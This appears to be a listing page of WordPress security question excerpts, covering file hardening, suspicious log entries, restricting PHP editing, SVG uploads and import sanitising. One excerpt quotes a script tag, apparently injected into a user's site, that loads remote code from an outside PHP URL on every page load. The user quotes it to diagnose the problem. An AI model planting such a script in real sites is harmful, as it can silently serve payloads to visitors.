Articles of security

What highest security brake with wordpress and static files?

I want to build my sites with WordPress files that can’t be modified and dirs where new files can’t be added. Static content with permission without possibilities to execute, that will served by another web server (can’t execute php code). Updates will be provide by change wordpress root, and update database. I want to know […]

200 return code on 'POST /wp-admin/admin-ajax.php' while NOT logged in

I noticed the following log entry: 111.22.3.444 – – [13/Mar/2015:08:31:00 +0100] “POST /wp-admin/admin-ajax.php HTTP/1.1” 200 618 “https://cap5.nl/veiligheidstips-en-voorkom-hacken-van-je-wachtwoord/” “Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36” It is my company website and guaranteed that nobody (including me) was logged in, or using the dashboard. Shouldn’t a /wp-admin/.. POST return a 404 or 403 instead […]

Finding where a snippet of code is coming from

I recently noticed that a site that I work on is making a call to an outside website on every page load. The following code is showing on every page: <script type=”text/javascript” src=”http://overtonenergy.com/fr4vvw8w.php?id=358757″></script> </head> As you can see it’s at the very bottom of the head. I don’t think it’s malicious as it just loads […]

RESTRICT EDIT of PHP files?

I wanted to restrict access to ALL Administrators to have access to EDIT any php file (Like Theme+plugin editor AND ETC..) I have developed a plugin, named System Edit Restriction. Currently, I use this code to make restriction: define( ‘DISALLOW_FILE_EDIT’, true ); define( ‘DISALLOW_FILE_MODS’, true ); $restricted_places = array(‘widgets.php’,’widgets.php’,’user-new.php’, ‘upgrade-functions.php’,’upgrade.php’, ‘themes.php’, ‘theme-install.php’, ‘theme-editor.php’,’setup-config.php’,’plugins.php’, ‘plugin-install.php’,’options-head.php’,’network.php’, ‘ms-users.php’,’ms-upgrade-network.php’,’ms-themes.php’, […]

Access log “POST /wp-login.php HTTP/1.0” 400

I’m looking the access log and I tried some lines as: IP – – [date and hour] “POST /wp-login.php HTTP/1.0″ 400 … What’s the problem? Someone wants hack my blog? How can I resolve?

Can't reset WordPress password

I haven’t logged onto my blog for years, and have, of course, forgotten the password. I click the ‘Forgot’ button and get a mail with a link, but that mail already says Sorry, that key does not appear to be valid. And sends me round the click to reset, receive a mail, click the link […]

Allow SVG in WP step by step

I’m not strong in WP programming, bu I try to understand what to do to enable SVG in my site. I found that in need to add function below to functions.php: /** * Add SVG capabilities */ function wpcontent_svg_mime_type( $mimes = array() ) { $mimes[‘svg’] = ‘image/svg+xml’; $mimes[‘svgz’] = ‘image/svg+xml’; return $mimes; } add_filter( ‘upload_mimes’, […]

How might I sanitize an XML file before WP Import? (Does wordpress verify or clean text when importing from an XML document? )

I have been tasked to import an older, offline wordpress site. I have the XML export file and a tar-ball of the file tree. Nothing has given me reason to worry, but does WP check the contents of the XML file as it imports it? Does it attempt to clean anything such as XSS attempts […]

WordPress security

I created a website for my customer via wordpress and I uploaded it in their server ..we assume the user have the access in the whole server ..is it possible to protect this website from being used in other server by protect editing admin password in database or adding a script that required my permission.

Webservice credential storage

This question already has an answer here: How to store username and password to API in wordpress option DB? 2 answers